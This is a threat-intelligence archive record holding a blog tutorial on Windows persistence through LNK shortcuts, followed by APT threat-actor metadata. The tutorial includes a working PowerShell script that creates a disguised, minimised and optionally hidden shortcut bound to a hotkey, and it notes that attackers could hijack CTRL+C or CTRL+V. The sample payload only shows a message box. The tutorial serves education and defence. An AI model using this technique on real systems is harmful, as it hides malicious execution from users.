{ "id": "543c8299-6ccf-4ab5-bc62-ab60cbd95593", "created_at": "2026-04-06T00:20:55.412863Z", "updated_at": "2026-04-10T13:12:35.839799Z", "deleted_at": null, "sha1_hash": "7d812b6f1a2815f24b18952461a878c6195923e5", "title": "Malware development: persistence - part 23. LNK files. Simple Powershell example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1444714, "plain_text": "Malware development: persistence - part 23. LNK files. Simple\r\nPowershell example.\r\nBy cocomelonc\r\nPublished: 2023-12-10 · Archived: 2026-04-05 21:50:18 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is based on my own research into one of the more interesting malware persistence tricks: via Windows\r\nLNK files.\r\nLNKPermalink\r\nAccording to Microsoft, an LNK file serves as a shortcut or “link” in Windows, providing a reference to an\r\noriginal file, folder, or application. For regular users, these files serve a meaningful purpose, facilitating file\r\norganization and workspace decluttering. However, from an attacker’s perspective, LNK files take on a different\r\nsignificance. They have been exploited in various documented attacks by APT groups and, to my knowledge,\r\nremain a viable option for activities such as phishing, establishing persistence, executing payloads.\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 1 of 9\n\nDo you know that Windows shortcuts can be registered using a shortcut key in terms of execution? This is the\r\nmain trick for malware persistence in this case.\r\npractical examplePermalink\r\nLet’s say we have a “malware”. As usually, meow-meow messagebox application hack.c :\r\n/*\r\nhack.c\r\nevil app for windows persistence\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2023/12/10/malware-pers-23.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAnd then, just create powershell script for create LNK file with the following properties:\r\n# Define the path for the shortcut on the desktop\r\n$shortcutPath = \"$([Environment]::GetFolderPath('Desktop'))\\Meow.lnk\"\r\n# Create a WScript Shell object\r\n$wshell = New-Object -ComObject Wscript.Shell\r\n# Create a shortcut object\r\n$shortcut = $wshell.CreateShortcut($shortcutPath)\r\n# Set the icon location for the shortcut\r\n$shortcut.IconLocation = \"C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe\"\r\n# Set the target path and arguments for the shortcut\r\n$shortcut.TargetPath = \"Z:\\2023-12-10-malware-pers-23\\hack.exe\"\r\n$shortcut.Arguments = \"\"\r\n# Set the working directory for the shortcut\r\n$shortcut.WorkingDirectory = \"Z:\\2023-12-10-malware-pers-23\"\r\n# Set a hotkey for the shortcut (e.g., CTRL+W)\r\n$shortcut.HotKey = \"CTRL+W\"\r\n# Set a description for the shortcut\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 2 of 9\n\n$shortcut.Description = \"Not malicious, meow-meow malware\"\r\n# Set the window style for the shortcut (7 = Minimized window)\r\n$shortcut.WindowStyle = 7\r\n# Save the shortcut\r\n$shortcut.Save()\r\n# Optionally make the link invisible by adding 'Hidden' attribute\r\n# (Get-Item $shortcutPath).Attributes += 'Hidden'\r\nAs you can see, the logic is pretty simple. We simply create a shortcut on the desktop that has a hotkey specified:\r\nCTRL+W . Of course, in real attack scenarios it could be something like CTRL+C , CTRL+V or CTRL+P , etc.\r\nFor example, if you create a shortcut for Paint , it does not have any hotkey specified:\r\nExplorer restricts shortcut support to commands beginning with CTRL+ALT. Additional sequences\r\nmust be set programmatically through COM.\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 3 of 9\n\ndemoPermalink\r\nLet’s go to see everything in action. First of all, compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sec\r\nFor checking correctness, run it:\r\n.\\hack.exe\r\nThe just run our powershell script for persistence:\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 4 of 9\n\nGet-Content pers.ps1 | PowerShell.exe -noprofile -\r\nAs a result, Meow LNK file is created successfully.\r\nIf we look at its properties, everything is ok:\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 5 of 9\n\nFinally just run it and try to trigger CTRL+W hotkey:\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 6 of 9\n\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 7 of 9\n\nAs you can see, everything worked perfectly as expected! =^..^= :)\r\nThis technique is used by APT groups like APT28, APT29, Kimsuky and software like Emotet in the wild. In all\r\nhonesty, this method is widely employed and widespread due to its extreme convenience in deceiving the victims.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nMany thanks to my friend and colleague Anton Kuznetsov, he reminded me of this technique when he presented\r\none of his most amazing talks.\r\nThis is a practical case for educational purposes only.\r\nATT\u0026CK MITRE: T1204.001\r\nAPT28\r\nAPT29\r\nKimsuky\r\nEmotet\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 8 of 9\n\nMSDN: Shell Link (.LNK) Binary File Format\r\nMalware persistence: part 1\r\nsource code in github\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nhttps://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html\r\nPage 9 of 9\n\n https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html \nGet-Content pers.ps1 | PowerShell.exe -noprofile \nAs a result, Meow LNK file is created successfully. \nIf we look at its properties, everything is ok: \n Page 5 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html" ], "report_names": [ "malware-pers-23.html" ], "threat_actors": [ { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434855, "ts_updated_at": 1775826755, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.pdf", "text": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.txt", "img": "https://archive.orkl.eu/7d812b6f1a2815f24b18952461a878c6195923e5.jpg" } }